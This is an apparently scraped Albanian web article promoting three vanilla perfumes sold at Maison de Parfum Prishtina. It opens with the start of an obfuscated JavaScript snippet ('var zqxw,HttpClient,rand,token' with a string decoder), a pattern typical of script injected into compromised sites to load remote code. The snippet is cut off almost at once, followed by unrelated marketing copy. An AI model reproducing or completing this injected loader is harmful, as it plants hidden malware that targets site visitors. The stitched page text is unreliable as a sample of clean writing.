;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Maison De Parfum Prishtina, ju prezanton tre parfume briliante për vjeshtë!

By

Kur stina e vjeshtës troket në derë, është koha perfekte për të riorganizuar koleksionin tuaj të parfumeve.

Aromat e ngrohta dhe të thella janë të përsosura për këtë periudhë, duke reflektuar ndryshimin e natyrës dhe duke sjellë një ndjesi të re.

Në parajsën e aromave, Maison de Parfum Prishtina, në Albi Mall dhe Prishtina Mall, mund të gjeni shumëllojshmëri të parfumeve niche, që ju dhurojnë ngrohtësinë dhe elegancën e sezonit.

Gjithsesi, kësaj radhe ne po ua prezantojmë vetëm tre nga ta:

EAU de Parfum Vanilla Powder – është më shumë se një parfum, është një përvojë që fton për të eksploruar botën e aromave më unike dhe të rehatshme.

 

Vanilja është zemra e këtoj parfumi, e cila njihet për aromat e përshtatshme për çdo rast, e që e bën atë një zgjedhje të shkëlqyer për ditët me shi, e mbrëmjet e freskëta.

Les Eaux Primordiales – parfumi që ju bën të udhëtoni në botën e aromave të paharrueshme.

 

Si një prej komponentëve më të dashur të parfumerisë, vanilja në këtë formulë është e pasur dhe e thellë, e krijuar për të shkëlqyer në çdo nuancë.

Ky parfum tejkalon kufijtë e thjeshtësisë, dhe është ideal për çdo vakt të ditës.

Kësisoj, ky parfum e meriton ta lejoni të bëhet pjesë e historisë tuaj dhe shijoni çdo moment vjeshtor.

EAU de Parfum, Vanille Leather – ky parfum është një festë për ndjenjat, duke përfaqësuar përzierjen e vaniljes së ëmbël dhe lëkurës së fortë – një kombinim që do t’ju lërë pa fjalë.

 

Zemra e këtij parfumi, vanilja do ju dhurojë ndjesinë e ngrohtësisë e rehatisë, si një përqafim i butë që ju mbush me energji positive.

Aroma e saj e ëmbël krijon atomsferë të qetë, nga ditët e zakonshme deri tek mbrëmjet e veçanta.

Pa u menduar dy herë, ky parfum duhet të jetë pjesë e koleksionit tuaj vjeshtor.

Edhe një herë – këto tri perla të parfumerisë i gjeni në Maison de Parfum Prishtina, në Albi Mall dhe në Prishtina Mall.

Artikuj të ngjashëm